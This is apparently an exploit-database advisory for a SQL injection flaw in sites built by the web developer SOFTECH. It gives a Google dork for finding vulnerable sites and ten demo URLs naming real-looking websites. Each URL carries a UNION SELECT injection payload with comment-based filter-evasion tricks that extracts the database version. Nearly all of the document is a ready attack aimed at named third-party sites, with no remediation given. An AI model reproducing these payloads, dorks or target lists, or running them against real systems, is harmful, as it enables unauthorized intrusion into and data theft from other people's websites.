######################
# Exploit Title : SOFTECH Design SQL injection Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://softech.pk/
# Google Dork : "Designed & Developed By: SOFTECH" inurl:products.php?id=
# Date: 2015 / 8 / 23
# Tested On : Win 8 / Mozilla Firefox
#
######################
#
# demos :
#
# ihproXduct.com/products.php?id=.62%27/**Naji**//*!50000UNION*//**Naji**/select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14--+
# http://www.betteXrstyleracing.com/products.php?id=.89%27/**Naji**//*!50000UNION*//**Naji**/select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14--+
# http://pishonimXpex.com/products.php?id=.7%27/**Naji**/union/**Naji**/select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14--+
# http://www.regenXtarchery.com/products.php?id=.8%27/**Naji**//*!50000UNION*//**Naji**/select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14--+
# http://www.saddXlederiders.com/products.php?id=.14%27/**Naji**//*!50000UNION*//**Naji**/select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14--+
# http://shahtajcXompany.com/products.php?id=.63%27/**Naji**//*!50000UNION*//**Naji**/select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14--+
# http://fullstopXintl.com/products.php?id=.2%27/**Naji**//*!50000UNION*//**Naji**/select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14--+
# http://lag-spXorts.com/products.php?id=.93%27/**Naji**//*!50000UNION*//**Naji**/select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14--+
# http://prefersporXts.com/products.php?id=.3%27/**Naji**//*!50000UNION*//**Naji**/select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14--+
# http://tenstarssXports.com/products.php?id=.112%27/**Naji**//*!50000UNION*//**Naji**/select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14--+
#
######################
# discovered by : Naji
######################